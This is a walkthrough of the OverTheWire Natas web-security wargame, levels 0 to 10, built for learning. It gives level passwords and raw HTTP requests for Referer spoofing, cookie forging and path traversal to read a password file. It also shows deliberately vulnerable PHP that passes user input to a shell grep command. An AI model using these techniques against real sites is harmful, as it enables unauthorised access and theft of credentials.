Natas

This is a collection of challenges built around common web application vulnerabilities.

Level 0

To start off we follow the instructions found here https://overthewire.org/wargames/natas/natas0.html and log into the first challenge at http://natas0.natas.labs.overthewire.org

This challenge is quite simple and the source code contains the password (CTRL+U in firefox).

gtVrDuiDfck831PqWsLEZy5gyDz1clto

Level 1

This challenge works exactly the same, but right clicking is blocked. This isn't a problem though since we're using a keyboard shortcut.

ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Level 2

When looking at the source code we see a file being references at files/pixel.png, navigating to /files shows us that there is a file called users.txt which contains the flag.

sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Level 3

There is a comment in the source code with the reference "Not even Google will find this" which implies a robot.txt file is involved here. checking that file shows us a directory /s3cr3t which contains a users.txt file that contains the flag.

Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

This page tells us that valid users only come from http://natas5.natas.labs.overthewire.org/, so we use the following burp request and manually set the Referer value to that endpoint.

GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
Referer: http://natas5.natas.labs.overthewire.org/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Level 5

This challenge simply tells us that we aren't logged in. Running the request through burp we see that there is a cookie called loggedin that is set to 0 by default. We modify the request and set the value to 1 as shown below.

GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Connection: close
Cookie: loggedin=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Level 6

This challenge presents us with a form to submit a secret with, and also provides a link to view the source code of the function. In the source code we see it is including a includes/secret.inc. when navigating to that page and viewing the source we are given the secret to submit. After submitting the secret we get the flag.

FOEIUWGHFEEUHOFUOIU

Level 7

On this challenge we see two href's using index.php?page=<page> which screams LFI on basic challenges like this. Using the following burp request we can read the file /etc/natas_webpass/natas8.

GET /index.php?page=../../../../../etc/natas_webpass/natas8 HTTP/1.1
Host: natas7.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://natas7.natas.labs.overthewire.org/
Authorization: Basic bmF0YXM3Ojd6M2hFRU5qUXRmbHpnblQyOXE3d0F2TU5mWmRoMGk5
Connection: close
Upgrade-Insecure-Requests: 1

Level 8

We are given another secret submission form as well as the source code. This time they are using a custom encoding function and checking it against a pre-encoded string. The secret validation code is shown below, as well as my decoding script. Running this gives us the secret.

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

import base64

def natasDecode(secret):
    # first we convert from hex -> string
    secret = bytearray.fromhex(secret).decode()
    # then we reverse the string
    secret = secret[::-1]
    # then we base64 decode the string
    secret = base64.b64decode(secret)
    # then we convert from bytearray to str for printing
    return secret.decode("utf-8")


plaintext = natasDecode('3d3d516343746d4d6d6c315669563362')
print(plaintext)

Level 9

In this challenge we are given a form that is then used to run grep via php. But it is not sanitizing input, so we can manipulate the command to read the flag file instead. The original php as well as the input needed to obtain the flag are shown below:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

Level 10

This challenge runs the same grep command with php, but it filters the user's input first. Our solution will still work though by removing the ; from our input. This will just have grep search our file as well as the one defined in the php file.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

PreviousBandit NextGoBot

Last updated 3 years ago

Was this helpful?